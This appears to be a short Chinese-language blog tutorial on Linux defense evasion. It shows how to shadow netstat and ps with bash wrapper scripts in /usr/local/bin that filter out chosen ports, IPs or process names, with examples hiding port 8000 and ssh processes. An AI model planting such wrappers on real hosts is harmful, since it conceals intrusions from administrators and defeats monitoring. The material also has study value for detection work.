linux进程隐匿

netstat 伪装

先寻找netstat路径

whereis netstat
which netstat

得到

/usr/bin/netstat

创建
/usr/local/bin/netstat

写入

1
2
# !/bin/bash
/usr/bin/netstat $@ | grep -Ev 'name|name|name'

含有引号中每个|分割符中的选项都会被屏蔽

可以是进程名、ip或端口

然后赋予执行权限并开启新shell,则生效。

例:

如我们开启python httpserver在8000端口

直接执行

1
netstat -ano | grep 0.0.0.0

得到结果中有开放的8000端口

修改/usr/local/bin/netstat为

1
2
# !/bin/bash
/usr/bin/netstat $@ | grep -Ev '8000'
1
chmod +x /usr/local/bin/netstat

打开新shell执行

1
netstat -ano | grep 0.0.0.0

ps伪装

以ps伪装隐藏ssh为例

首先通过ps查看ssh进程

1
ps -ef | grep ssh

先寻找ps路径

whereis ps
which ps

得到

/bin/ps

创建

/usr/local/bin/ps

写入需要伪装的进程如ssh

1
2
# !/bin/bash
/bin/ps $@ | grep -Ev 'ssh'
1
chmod +x /usr/local/bin/ps

新shell种使用ps命令,无法看到包含ssh关键字的进程

防御规避
防御规避

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!